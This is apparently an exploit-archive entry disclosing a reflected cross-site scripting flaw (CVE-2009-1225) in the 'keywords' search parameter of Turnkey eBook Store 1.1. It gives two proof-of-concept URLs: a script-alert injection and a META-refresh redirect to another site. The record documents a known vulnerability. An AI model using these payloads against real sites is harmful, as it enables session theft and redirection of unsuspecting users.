Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting
Author: TEAMELITE
type: webapps
platform: php
port:
date_added: 2009-03-31
date_updated: 2014-04-15
verified: 1
codes: CVE-2009-1225;OSVDB-53121
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/34324/info
Turnkey eBook Store is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Turnkey eBook Store 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>
http://www.example.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://www.example2.net">